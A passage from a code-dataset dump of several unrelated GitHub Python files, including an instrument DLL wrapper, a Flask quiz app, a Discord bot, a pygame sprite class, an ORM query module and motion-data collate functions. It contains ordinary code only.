``wrap_dll_function``, but check the return value and convert\n it to a Python exception or warning if it is nonzero using\n ``self._check_error``. The arguments are the same as for\n ``wrap_dll_function``, except that ``restype`` is always ``ViStatus``.\n \"\"\"\n\n func = self.wrap_dll_function(\n name_in_library=name_in_library,\n argtypes=argtypes,\n restype=ViStatus,\n )\n\n # see https://docs.python.org/3/library/ctypes.html#return-types\n func.restype = self._check_error\n\n return func\n\n def init(self, resource: str, id_query: bool = True,\n reset_device: bool = False) -> ViSession:\n \"\"\"\n Convenience wrapper around libName_init (e.g. niRFSG_init). Returns the\n ViSession handle of the initialized session. The wrapped version of the\n actual DLL function is registered as self._init, see __init__. Note\n that this class is not responsible for storing the handle, it should\n be managed by the function or class that calls the functions wrapped by\n this class.\n\n Args:\n resource: the resource name of the device to initialize, as given\n by NI MAX.\n id_query: whether to perform an ID query on initialization\n reset_device: whether to reset the device during initialization\n Returns:\n the ViSession handle of the initialized device\n \"\"\"\n session = ViSession()\n self._init(ViRsrc(c_str(resource)), id_query, reset_device,\n ctypes.byref(session))\n return session\n\n def get_attribute(self, session: ViSession, attr: AttributeWrapper) -> Any:\n \"\"\"\n Get an attribute with data type \"DataType\" by calling the appropriate\n \"libName_GetAttribute\" function (for example\n niRFSG_GetAttributeViReal64 when ``lib_prefix`` is \"niRFSG\" and\n ``attr.dtype`` is ``ViReal64``).\n\n NOTE: channels are not implemented.\n \"\"\"\n dtype = attr.dtype\n if dtype not in self._dtype_map:\n raise ValueError(f\"get_attribute() not implemented for {dtype}\")\n\n dtype_name = self._dtype_map[dtype]\n func = getattr(self, f\"GetAttribute{dtype_name}\")\n\n if dtype == ViString:\n res = ctypes.create_string_buffer(STRING_BUFFER_SIZE)\n func(session, b\"\", attr.value, STRING_BUFFER_SIZE, res)\n ret: Any = res.value.decode()\n else:\n res = dtype()\n func(session, b\"\", attr.value, ctypes.byref(res))\n ret = res.value\n\n return ret\n\n def set_attribute(self, session: ViSession, attr: AttributeWrapper,\n set_value: Any) -> Any:\n \"\"\"\n Set an attribute with data type \"DataType\" by calling the appropriate\n \"libName_SetAttribute\" function (for example\n niRFSG_SetAttributeViReal64 when ``lib_prefix`` is \"niRFSG\" and\n ``attr.dtype`` is ``ViReal64``).\n\n NOTE: channels are not implemented.\n \"\"\"\n dtype = attr.dtype\n if dtype not in self._dtype_map:\n raise ValueError(f\"set_attribute() not implemented for {dtype}\")\n\n dtype_name = self._dtype_map[dtype]\n func = getattr(self, f\"SetAttribute{dtype_name}\")\n\n if dtype == ViString:\n res = ctypes.create_string_buffer(STRING_BUFFER_SIZE)\n func(session, b\"\", attr.value, c_str(set_value), res)\n ret = res.value.decode()\n else:\n res = dtype()\n func(session, b\"\", attr.value, set_value)\n\n def error_message(self, session: Optional[ViSession] = None,\n error_code: ViStatus = ViStatus(0)) -> str:\n \"\"\"\n Convenience wrapper around libName_error_message (which is wrapped as\n self._error_message).\n \"\"\"\n buf = ctypes.create_string_buffer(STRING_BUFFER_SIZE)\n self._error_message(session or VI_NULL, error_code, buf)\n return buf.value.decode()\n","repo_name":"QCoDeS/Qcodes_contrib_drivers","sub_path":"qcodes_contrib_drivers/drivers/NationalInstruments/dll_wrapper.py","file_name":"dll_wrapper.py","file_ext":"py","file_size_in_byte":11449,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"35"} +{"seq_id":"12629900470","text":"import math\nimport pytest\nfrom pathlib import Path\nfrom papadimitriou import papadimitriou, reduce_clauses, read_input, read_output\n\n\npath = Path(r\"C:\\Python\\Stanford Algorithms Problem Sets\\Test_Cases\\stanford-algs\\testCases\\course4\\assignment4TwoSat\").glob('**/*')\nfiles = [x for x in path if x.is_file()]\n\ninput_files = [file for file in files if \"input\" in file.name]\noutput_files = [file for file in files if \"output\" in file.name]\n\ntest_cases = []\nfor i, _ in enumerate(input_files):\n clauses = read_input(input_files[i])\n expected = read_output(output_files[i])\n test_case = (clauses, expected)\n test_cases.append(test_case)\n\n\n@pytest.mark.parametrize('clauses, expected', test_cases)\ndef test_knapsack(clauses, expected):\n reduced_clauses = reduce_clauses(clauses)\n actual = papadimitriou(reduced_clauses)\n\n assert(expected == actual)\n\n\nif __name__ == '__main__':\n clauses, expected = test_cases[21]\n test_knapsack(clauses, expected)","repo_name":"TimKindervatter/Algorithms-Design-and-Analysis","sub_path":"14-2SAT/test_papadimitriou.py","file_name":"test_papadimitriou.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36315813177","text":"from random import randint\nimport hello\n\n\ndef test_payCalculator_prints_correct_result(capfd, monkeypatch):\n monkeypatch.setattr('builtins.input', lambda _:\"Chuck\")\n hello.hello()\n\n out, err = capfd.readouterr()\n print(out)\n assert out == 'Hello Chuck\\n'\n","repo_name":"ichbinryan/PY4E-Mod022Asgmt-Howdy","sub_path":"test_Program.py","file_name":"test_Program.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19333953354","text":"from flask import Flask, render_template, request\nfrom helpers import favorite, delist, User\n\napp: Flask = Flask(__name__)\n\nflavor_dict: dict[str, int] = {\"Sweet\": 0, \"Sour\": 0, \"Spicy\": 0, \"Salty\": 0}\nfav_flavs: str = \"\"\n\nuser_number: int = 0\nusers: list[int] = []\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n return render_template('index.html')\n\n@app.route('/quizpg1', methods=[\"GET\", \"POST\"])\ndef quizpg1():\n return render_template(\"quizpg1.html\")\n\n@app.route('/quizpg2', methods=[\"GET\", \"POST\"])\ndef quizpg2():\n if request.method == \"POST\":\n global flavor_dict \n flavor = (request.form[\"image-pick\"])\n flavor_dict[flavor] += 1\n return render_template(\"quizpg2.html\")\n\n@app.route('/quizpg3', methods=[\"GET\", \"POST\"])\ndef quizpg3():\n if request.method == \"POST\":\n global flavor_dict\n flavor = (request.form[\"image-pick\"])\n flavor_dict[flavor] += 1\n return render_template(\"quizpg3.html\")\n\n@app.route('/quizpg4', methods=[\"GET\", \"POST\"])\ndef quizpg4():\n if request.method == \"POST\":\n global flavor_dict\n flavor = (request.form[\"image-pick\"]) \n flavor_dict[flavor] += 1\n return render_template(\"quizpg4.html\")\n\n@app.route('/results', methods=[\"GET\", \"POST\"])\ndef results():\n global fav_flavs, flavor_dict, user_number, users\n if request.method == \"POST\":\n global flavor_dict \n flavor = (request.form[\"image-pick\"])\n flavor_dict[flavor] += 1\n fav = favorite(flavor_dict)\n fav_flavs = delist(fav)\n user_number += 1\n new_user: User =User(user_number, fav_flavs)\n users.append(new_user)\n flavor_dict = {\"Sweet\": 0, \"Sour\": 0, \"Spicy\": 0, \"Salty\": 0}\n return render_template(\"results.html\", fav_flavs=fav_flavs)\n\n\n@app.route('/all_results')\ndef all_results():\n return render_template(\"all_results.html\", users=users)\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"tsaiyi0/quiz","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24712325898","text":"a = int(input(\"Enter Customer ID : \"))\nb = input(\"Enter the name of the customer : \")\nc = int(input(\"Enter the litres consumed by the customer : \"))\nif c <= 199:\n s = c * 3\nelif 200 <= c < 400:\n s = c * 3.35\nelif 400 <= c < 600:\n s = c * 4.80\nelse:\n s = c * 5.10\nif s > 1250:\n s = s + (15/100 * s)\nprint(a)\nprint(b)\nprint(c)\nprint(int(s))\n","repo_name":"Codechef-SRM-NCR-Chapter/Code-Genesis","sub_path":"answers/VrishtiSharma/Conditonals/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"72292146661","text":"from email.policy import default\nfrom http import client\nimport discord\nfrom dotenv import load_dotenv\nimport os\nimport random\n\ndefault_intents = discord.Intents.default()\ndefault_intents.members = True #activer les intents relatifs aux membres\nclient = discord.Client(intents = default_intents)\n\nload_dotenv(dotenv_path=\"config\")\ntoken = os.getenv(\"token\")\n\nclass DocBot(discord.Client):\n \n @client.event\n async def on_ready(self):\n print (\"Amrane's bot connected...\")\n\n #reponse à un message\n @client.event\n async def on_message(self, message):\n if message.content == \"Ping\" or message.content ==\"ping\":\n await message.channel.send(\"Pong\")\n elif message.content == \"bonjour\" or message.content == \"Bonjour\":\n await message.channel.send(\"salut\") #attention faut pas mettre la meme chaine que dans le if\n\n elif message.content.startswith(\"!del\"):\n number = int(message.content.split()[1])\n messages = await message.channel.history(limit=number + 1).flatten() #historique des messages postés\n for each_message in messages:\n await each_message.delete()\n \n elif message.content.startswith(\"!help\"):\n await message.channel.send(\"!del -chiffre- : ca vous permet de supprime les n message\\n !help : vous affiche les commandes que vous pouvez utilisé \\n !random (n1 n2) : genere un chiffre aleatoirement entre les 2 nombre que vous mettrez \\n !play : \")\n \n elif message.content.startswith(\"!random\"):\n a = int(message.content.split()[1])\n b = int(message.content.split()[2])\n x = random.randrange(a, b)\n await message.channel.send(x)\n\n\n elif message.content.startswith(\"!play\"):\n number = random.randint(1,10)\n await message.channel.send('I have a number in mind between 1 and 10, guess')\n #await message.channel.send(number)\n if int(message.content) == number:\n await message.channel.send('You got it!')\n else:\n await message.channel.send(\"you loose\")\n\n #***************************************************** \n\n #arrivée d'un nouveau membre\n\n @client.event\n async def on_member_join(self, member):\n general_channel: discord.Textchannel = client.get_channel(958699791393632276)\n await general_channel.send(content=f\"bienvenue sur le serveur {member.display_name} \")\n \n\nclient = DocBot()\nclient.run(token)\n\n\n","repo_name":"amrane97/TP3","sub_path":"TP4/DocBot.py","file_name":"DocBot.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36489175578","text":"import pygame\n\nfrom time import time\nfrom random import randint\n# Import the settings\nimport settings\n\n\nclass UFO(pygame.sprite.Sprite):\n \"\"\"\n Base class for spaceships.\n\n Attributes\n ----------\n src : image\n The image of the object\n image : pygame.Surface\n The surface of the object\n rect : pygame.Surface().get_rect\n The rectangle of the object\n damage_sound : pygame.mixer.Sound\n The sound when the object is hit by Bullet\n destroyed_sound : pygame.mixer.Sound\n The sound when the object health points reach 0\n lose_hp_sound : pygame.mixer.Sound\n The sound when the player loses hp\n center : tuple\n Integers representing the position of the center of the object\n index : int\n Integer to keep track of the current explosion image\n explosion_sprites : list\n Images of explosion\n speed : int\n The speed of the object\n health : int\n The health of the object\n strafe : bool\n True/False, allows the object to randomly change its position on the y-axis\n cooldown : float\n The amount of time to wait between strafes\n timer : float\n The time when the object was created\n chance_to_strafe : int\n The chance of the object to strafe\n direction : bool\n The direction of the strafe\n\n Methods\n -------\n strafing()\n Randomly changes the position of the object on the y-axis\n explode()\n Displays an explosion animation\n update(screen)\n Updates the object\n \"\"\"\n def __init__(self, pos_x, pos_y, face, w, h):\n super().__init__()\n \"\"\"\n Parameters\n ----------\n pos_x : int\n The position on the x-axis\n pos_y : int\n The position on the y-axis\n face : str\n Path to the image of the object\n w : int\n Width of the object\n h : int\n Height of the object\n \"\"\"\n\n self.src = pygame.image.load(face).convert_alpha()\n self.image = pygame.Surface((w, h)).convert_alpha()\n pygame.transform.scale(self.src.convert_alpha(), (w, h), self.image)\n self.rect = self.image.get_rect(center=(pos_x, pos_y))\n\n self.damage_sound = pygame.mixer.Sound(settings.SOUNDS[\"hit\"])\n self.destroyed_sound = pygame.mixer.Sound(settings.SOUNDS[\"enemy_destroyed\"])\n self.lose_hp_sound = pygame.mixer.Sound(settings.SOUNDS[\"lose_hp\"])\n self.lose_hp_sound.set_volume(0.5)\n\n self.center = None\n\n self.index = 0\n self.explosion_sprites = []\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_1.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_2.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_3.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_4.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_5.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_6.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_7.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_8.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_9.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_10.png\"))\n self.explosion_sprites.append(pygame.image.load(r\"imgs\\Explosion1_11.png\"))\n\n self.speed = 1\n self.health = 1\n\n self.strafe = False\n self.cooldown = 1.75\n self.timer = time()\n self.chance_to_strafe = 25\n self.direction = randint(0, 1)\n\n def strafing(self) -> None:\n \"\"\"\n Randomly changes the position of the object on the y-axis.\n \"\"\"\n # Check if the object can strafe and it's alive\n if self.strafe and self.health > 0:\n # Check if enough time has passed and try to strafe\n if time() - self.timer > self.cooldown and randint(0, 100) < self.chance_to_strafe:\n # Get the strafe direction\n if self.direction == 1:\n self.rect.x += 50\n else:\n self.rect.x -= 50\n # Get a new strafe direction\n self.direction = randint(0, 1)\n self.timer = time() # reset the timer\n # Forbid the object to leave the screen\n if self.rect.x + self.rect.width > settings.SCREEN_WIDTH:\n self.rect.x = settings.SCREEN_WIDTH - self.rect.width - 10\n elif self.rect.x - 5 < 0:\n self.rect.x = 10\n\n def explode(self) -> None:\n \"\"\"\n Display an explosion animation when the object is dead.\n\n \"\"\"\n # Prevent the player from moving\n self.speed = 0\n self.center = self.rect.center # get the center of the object to display each explosion frame in the same pos\n # Check if all explosion images have been displayed\n if self.index > len(self.explosion_sprites):\n self.kill() # destroy the object\n else:\n self.image = self.explosion_sprites[int(self.index)] # display the current explosion image\n self.rect = self.image.get_rect(center=self.center)\n self.index += 0.2\n\n def update(self, screen) -> None:\n \"\"\"\n Update the object.\n\n Parameters\n ----------\n screen : pygame.display.set_mode()\n The screen object created by pygame\n \"\"\"\n # Check if the object can strafe and strafe\n self.strafing()\n # Check if the object is dead and start the exploding animation\n if self.health == 0:\n self.explode()\n # If the object manages to leave the screen, decrease player's health points by 1 and kill this object\n elif self.rect.y > pygame.display.get_surface().get_height():\n settings.player_health_points -= 1\n self.lose_hp_sound.play() # play lose hp sound\n self.kill()\n else:\n self.rect.y += self.speed # Move the object downwards\n","repo_name":"Raures/StarDefender","sub_path":"objects/spaceships/UFO.py","file_name":"UFO.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73168319139","text":"import copy\nimport operator\nfrom functools import reduce, partial\nfrom sqlbuilder import smartsql\nfrom ascetic.exceptions import ObjectDoesNotExist\nfrom ascetic.relations import Relation, ForeignKey, OneToOne, OneToMany\nfrom ascetic.signals import field_mangling, column_mangling\nfrom ascetic.utils import to_tuple\n\nfactory = copy.copy(smartsql.factory)\n\ntry:\n str = unicode # Python 2.* compatible\n string_types = (basestring,)\n integer_types = (int, long)\nexcept NameError:\n string_types = (str,)\n integer_types = (int,)\n\n\n@factory.register\nclass Table(smartsql.Table):\n\n def __init__(self, mapper, *args, **kwargs):\n \"\"\"\n :type mapper: ascetic.mappers.Mapper\n \"\"\"\n super(Table, self).__init__(mapper.db_table, *args, **kwargs)\n self._mapper = mapper\n\n @property\n def q(self):\n return self._mapper.query\n\n def get_fields(self, prefix=None):\n return self._mapper.get_sql_fields(prefix)\n\n def get_field(self, name):\n if type(name) == tuple:\n return smartsql.CompositeExpr(*(self.get_field(k) for k in name))\n\n parts = name.split(smartsql.LOOKUP_SEP, 1)\n name = self.__mangle_field(parts[0])\n\n if name == 'pk':\n name = self._mapper.pk\n elif isinstance(self._mapper.relations.get(name, None), Relation):\n relation = self._mapper.relations.get(name)\n related_alias = relation.related_mapper.sql_table.as_(next(smartsql.auto_name))\n return AutoJoinedTable(\n related_alias,\n smartsql.InnerJoin(None, related_alias, relation.get_join_where(self, related_alias))\n ).f\n # name = self._mapper.relations.get(name).field\n\n if type(name) == tuple:\n if len(parts) > 1:\n # FIXME: \"{}_{}\".format(alias, name) ???\n raise Exception(\"Can't set single alias for multiple fields of composite key {}.{}\".format(self.model, name))\n return smartsql.CompositeExpr(*(self.get_field(k) for k in name))\n\n if name in self._mapper.fields:\n name = self._mapper.fields[name].column\n\n parts[0] = self.__mangle_column(name)\n return super(Table, self).get_field(smartsql.LOOKUP_SEP.join(parts))\n\n def __mangle_field(self, name):\n results = field_mangling.send(sender=self, field=name, mapper=self._mapper)\n results = [i[1] for i in results if i[1]]\n if results:\n # response in format tuple(priority: int, mangled_field_name: str)\n results.sort(key=lambda x: x[0], reverse=True) # Sort by priority\n return results[0][1]\n return name\n\n def __mangle_column(self, column):\n results = column_mangling.send(sender=self, column=column, mapper=self._mapper)\n results = [i[1] for i in results if i[1]]\n if results:\n # response in format tuple(priority: int, mangled_column_name: str)\n results.sort(key=lambda x: x[0], reverse=True) # Sort by priority\n return results[0][1]\n return column\n\n\n@factory.register\nclass TableAlias(smartsql.TableAlias, Table):\n @property\n def _mapper(self):\n return getattr(self._table, '_mapper', None) # self._table can be a subquery\n\n\nclass AutoJoinedTable(Table):\n def __init__(self, delegate, auto_join):\n self.m_delegate__ = delegate\n self.m_auto_join__ = auto_join\n\n smartsql.Table.__init__(self, None)\n if isinstance(delegate, smartsql.Table):\n for f in delegate._fields.values():\n self._append_field(copy.copy(f))\n\n @property\n def _mapper(self):\n return getattr(self.m_delegate__, '_mapper', None) # self._table can be a subquery\n\n\n@smartsql.compile.when(AutoJoinedTable)\ndef compile_autojoinedtable(compile, expr, state):\n if (expr.m_auto_join__ not in state.auto_join_tables):\n state.auto_join_tables.append(expr.m_auto_join__)\n compile(expr.m_delegate__, state)\n\n\nclass Result(smartsql.Result):\n \"\"\"Result adapted for table.\"\"\"\n\n def __init__(self, mapper, db):\n \"\"\"\n :type mapper: ascetic.mappers.Mapper\n :type db: ascetic.interfaces.IDatabase\n \"\"\"\n self.mapper = mapper\n self._prefetch = {}\n self._select_related = {}\n self._is_base = True\n self._map = default_map\n self._cache = None # empty list also can be a cached result, so, using None instead of empty list\n self._db = db\n\n def __len__(self):\n self.fill_cache()\n return len(self._cache)\n\n def __iter__(self):\n self.fill_cache()\n return iter(self._cache)\n\n def __getitem__(self, key):\n if self._cache:\n return self._cache[key]\n elif isinstance(key, integer_types):\n self._query = super(Result, self).__getitem__(key)\n try:\n return list(self)[0]\n except IndexError:\n raise ObjectDoesNotExist\n else:\n return super(Result, self).__getitem__(key)\n\n def execute(self):\n \"\"\"Implementation of query execution\"\"\"\n return self._db.execute(self._query)\n\n insert = update = delete = execute\n\n def select(self):\n return self\n\n def count(self):\n if self._cache is not None:\n return len(self._cache)\n return self.execute().fetchone()[0]\n\n def clone(self):\n c = smartsql.Result.clone(self)\n c._cache = None\n c._is_base = False\n return c\n\n def fill_cache(self):\n if self.is_base():\n raise Exception('You should clone base queryset before query.')\n elif self._cache is None:\n self._cache = list(self.iterator())\n self.populate_prefetch()\n\n def iterator(self):\n \"\"\"Iterator\"\"\"\n cursor = self.execute()\n fields = tuple(f[0] for f in cursor.description)\n\n if isinstance(self._map, type):\n map_row = self._map(self)\n else:\n map_row = partial(self._map, result=self, state={})\n\n for row in cursor.fetchall():\n yield map_row(row=zip(fields, row))\n\n def db(self, db=None):\n \"\"\"\n :type db: ascetic.interfaces.IDatabase or None\n :rtype: ascetic.interfaces.IDatabase\n \"\"\"\n if db is None:\n return self._db\n self._db = db\n return self._query\n\n def is_base(self, value=None):\n if value is None:\n return self._is_base\n self._is_base = value\n return self._query\n\n def map(self, map):\n \"\"\"Sets map.\"\"\"\n c = self\n c._map = map\n return c._query\n\n def prefetch(self, *a, **kw):\n \"\"\"Prefetch relations\"\"\"\n relations = self.mapper.relations\n if a and not a[0]: # .prefetch(False)\n self._prefetch = {}\n else:\n self._prefetch = copy.copy(self._prefetch)\n self._prefetch.update(kw)\n self._prefetch.update({i: relations[i].related_query for i in a})\n return self._query\n\n def populate_prefetch(self):\n relations = self.mapper.relations\n for key, query in self._prefetch.items():\n relation = relations[key]\n preset_relation = RelationPresetter(relation)\n # recursive handle prefetch\n cond = reduce(operator.or_, (relation.get_related_where(obj) for obj in self._cache))\n query = query.where(cond)\n for obj in self._cache:\n for prefetched_obj in query:\n if relation.get_value(obj) == relation.get_related_value(prefetched_obj):\n preset_relation(obj, related_obj=prefetched_obj)\n\n\nclass RelationPresetter(object):\n def __new__(cls, relation):\n if isinstance(relation, ForeignKey):\n return object.__new__(ForeignKeyPresetter)\n elif isinstance(relation, OneToOne):\n return object.__new__(OneToOnePresetter)\n elif isinstance(relation, OneToMany):\n return object.__new__(OneToManyPresetter)\n else:\n raise NotImplementedError(relation)\n\n def __init__(self, relation):\n \"\"\"\n :type relation: ascetic.relations.Relation\n \"\"\"\n self._relation = relation\n\n def __call__(self, obj, related_obj):\n raise NotImplementedError\n\n @property\n def name(self):\n return self._relation.name\n\n @property\n def related_name(self):\n return self._relation.related_name\n\n @staticmethod\n def set_value(obj, attr_name, related_obj):\n setattr(obj, attr_name, related_obj)\n\n @staticmethod\n def append_value(obj, attr_name, related_item):\n query = getattr(obj, attr_name)\n if query.result._cache is None:\n query.result._cache = []\n query.result._cache.append(related_item)\n\n\nclass ForeignKeyPresetter(RelationPresetter):\n def __call__(self, obj, related_obj):\n self.set_value(obj, self.name, related_obj)\n self.append_value(related_obj, self.related_name, obj)\n\n\nclass OneToOnePresetter(RelationPresetter):\n def __call__(self, obj, related_obj):\n self.set_value(obj, self.name, related_obj)\n self.set_value(related_obj, self.related_name, obj)\n\n\nclass OneToManyPresetter(RelationPresetter):\n def __call__(self, obj, related_obj):\n if not hasattr(obj, self.name):\n setattr(obj, self.name, [])\n self.append_value(obj, self.name, related_obj)\n self.set_value(related_obj, self.related_name, obj)\n\n\ndef default_map(result, row, state):\n return result.mapper.load(row, result.db(), from_db=True)\n\n\nclass SelectRelatedMap(object):\n\n def __init__(self, result):\n self._result = result\n self._state = {}\n\n def __call__(self, row):\n models = [self._result.mapper.model]\n relations = self._result._select_related\n for rel in relations:\n models.append(rel.related_model)\n rows = self._get_model_rows(models, row)\n objs = self._get_objects(models, rows)\n self._build_relations(relations, objs)\n return objs\n\n def _get_model_rows(self, models, row):\n rows = [] # There can be multiple the same models, so, using dict instead of model\n start = 0\n for model in models:\n mapper = self._result.mapper.get_mapper(model)\n length = len(mapper.get_sql_fields())\n rows.append(row[start:length])\n start += length\n return rows\n\n def _get_objects(self, models, rows):\n objs = []\n for model, model_row in zip(models, rows):\n mapper = self._result.mapper.get_mapper(model)\n pk = to_tuple(mapper.pk)\n pk_columns = tuple(mapper.fields[k].columns for k in pk)\n model_row_dict = dict(model_row)\n pk_values = tuple(model_row_dict[k] for k in pk_columns)\n key = (model, pk_values)\n if key not in self._state:\n self._state[key] = mapper.load(model_row, self._result.db(), from_db=True)\n objs.append(self._state[key])\n return objs\n\n def _build_relations(self, relations, objs):\n for i, relation in enumerate(relations):\n obj, related_obj = objs[i], objs[i + 1]\n RelationPresetter(relation)(obj, related_obj)\n","repo_name":"emacsway/ascetic","sub_path":"ascetic/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":11365,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"46163085306","text":"# Use the file name mbox-short.txt as the file name\r\nfname = input(\"Enter file name: \")\r\nfh = open(fname)\r\nvalue_array=[]\r\ntotal = 0\r\ncount = 0\r\nfor line in fh:\r\n if not line.startswith(\"X-DSPAM-Confidence:\") : continue\r\n else:\r\n line=line.split(':')\r\n line[1] = line[1].replace('\\n', '')\r\n total = total + float(line[1])\r\n count = count + 1\r\n #print(line[1])\r\n #value_array.append(float(line[1]))\r\n \r\nprint(\"Average spam confidence: {0:.12f}\".format(total/count))","repo_name":"childofthefence/python_datasctructures_umich","sub_path":"spam_confidence.py","file_name":"spam_confidence.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4156516134","text":"import random\nimport torch\nfrom data_loaders.amass.tools import collate_tensor_with_padding\n\ndef lengths_to_mask(lengths, max_len):\n # max_len = max(lengths)\n mask = torch.arange(max_len, device=lengths.device).expand(len(lengths), max_len) < lengths.unsqueeze(1)\n return mask\n \n\ndef collate_tensors(batch):\n dims = batch[0].dim()\n max_size = [max([b.size(i) for b in batch]) for i in range(dims)]\n size = (len(batch),) + tuple(max_size)\n canvas = batch[0].new_zeros(size=size)\n for i, b in enumerate(batch):\n sub_tensor = canvas[i]\n for d in range(dims):\n sub_tensor = sub_tensor.narrow(d, 0, b.size(d))\n sub_tensor.add_(b)\n return canvas\n\n\ndef collate(batch):\n notnone_batches = [b for b in batch if b is not None]\n databatch = [b['inp'] for b in notnone_batches]\n if 'lengths' in notnone_batches[0]:\n lenbatch = [b['lengths'] for b in notnone_batches]\n else:\n lenbatch = [len(b['inp'][0][0]) for b in notnone_batches]\n\n\n databatchTensor = collate_tensors(databatch)\n lenbatchTensor = torch.as_tensor(lenbatch)\n maskbatchTensor = lengths_to_mask(lenbatchTensor, databatchTensor.shape[-1]).unsqueeze(1).unsqueeze(1) # unqueeze for broadcasting\n\n motion = databatchTensor\n cond = {'y': {'mask': maskbatchTensor, 'lengths': lenbatchTensor}}\n\n if 'is_transition' in notnone_batches[0]:\n is_transition_batch = torch.stack([b['is_transition']for b in notnone_batches])\n cond['y'].update({'is_transition': is_transition_batch})\n\n if 'length_transition' in notnone_batches[0]:\n length_transition = [b['length_transition'] for b in notnone_batches]\n cond['y'].update({'length_transition': length_transition})\n\n if 'text' in notnone_batches[0]:\n textbatch = [b['text'] for b in notnone_batches]\n cond['y'].update({'text': textbatch})\n\n if 'other_motion' in notnone_batches[0]:\n other_motion = [b['other_motion'] for b in notnone_batches]\n other_motion = collate_tensors(other_motion)\n cond['y'].update({'other_motion': other_motion})\n\n if 'person_id' in notnone_batches[0]:\n textbatch = [b['person_id'] for b in notnone_batches]\n cond['y'].update({'person_id': textbatch})\n\n if 'tokens' in notnone_batches[0]:\n textbatch = [b['tokens'] for b in notnone_batches]\n cond['y'].update({'tokens': textbatch})\n\n if 'action' in notnone_batches[0]:\n actionbatch = [b['action'] for b in notnone_batches]\n cond['y'].update({'action': torch.as_tensor(actionbatch).unsqueeze(1)})\n\n # collate action textual names\n if 'action_text' in notnone_batches[0]:\n action_text = [b['action_text']for b in notnone_batches]\n cond['y'].update({'action_text': action_text})\n\n if 'action_cat' in notnone_batches[0]:\n action_cat = torch.stack([b['action_cat']for b in notnone_batches])\n action_cat_mask = torch.stack([b['action_cat_mask']for b in notnone_batches])\n act_cat_list = [b['act_cat_list']for b in notnone_batches]\n cond['y'].update({'action_cat': action_cat})\n cond['y'].update({'action_cat_mask': action_cat_mask})\n cond['y'].update({'act_cat_list': act_cat_list})\n\n return motion, cond\n\n# an adapter to our collate func\ndef t2m_collate(batch):\n # batch.sort(key=lambda x: x[3], reverse=True)\n adapted_batch = [{\n 'inp': torch.from_numpy(b[4].T).float().unsqueeze(1), # [seqlen, J] -> [J, 1, seqlen]\n 'text': b[2], #b[0]['caption']\n 'tokens': b[6],\n 'lengths': b[5],\n 'is_transition': torch.zeros(1), # just for eval not really needed\n } for b in batch]\n return collate(adapted_batch)\n\ndef babel_eval_collate(batch):\n try:\n adapted_batch = [{\n 'inp': torch.from_numpy(b[4].T).float().unsqueeze(1), # [seqlen, J] -> [J, 1, seqlen]\n 'text': b[2], #b[0]['caption']\n 'tokens': b[6],\n 'lengths': b[5],\n 'is_transition': torch.from_numpy(b[7]),\n } for b in batch]\n except TypeError:\n print(5)\n return collate(adapted_batch)\n\ndef pw3d_collate(batch):\n # batch.sort(key=lambda x: x[3], reverse=True)\n adapted_batch = [{\n 'other_motion': torch.tensor(b[0].T).float().unsqueeze(1),\n 'inp': torch.tensor(b[4].T).float().unsqueeze(1), # [seqlen, J] -> [J, 1, seqlen]\n 'text': b[2], #b[0]['caption']\n 'person_id': b[3],\n 'tokens': b[6],\n 'lengths': b[5],\n } for b in batch]\n return collate(adapted_batch)\n\nfrom enum import IntEnum\n\nclass motion_type(IntEnum):\n MOTION_0 = 0\n MOTION_1 = 1\n MOTION_0_W_T = 2\n MOTION_1_W_T = 3\n\ndef pad_sample_with_zeros(sample, vector_len):\n # pad inp, change lenghts, and pad is transition\n n_feats, _, seq_len = sample['inp'].shape\n len_to_pad = vector_len-seq_len\n torch.zeros_like(sample['inp'])\n is_transition_padding = torch.zeros(len_to_pad)\n inp_padding = torch.zeros((n_feats, 1, len_to_pad))\n sample['inp'] = torch.cat((sample['inp'], inp_padding), dim=2)\n sample['is_transition'] = torch.cat((sample['is_transition'], is_transition_padding))\n return sample\n\ndef babel_collate(batch):\n from data_loaders.amass.tools import collate_pairs_and_text\n batch = collate_pairs_and_text(batch)\n bs = len(batch['motion_feats'])\n adapted_batch = []\n for ii in range(bs):\n adapted_batch.append({\n 'inp': batch['motion_feats'][ii].permute(1, 0).unsqueeze(1), # [seqlen, J] -> [J, 1, seqlen]\n 'text': batch['text'][ii],\n 'lengths': batch['length'][ii],\n 'is_transition': batch['is_transition'][ii]})\n return 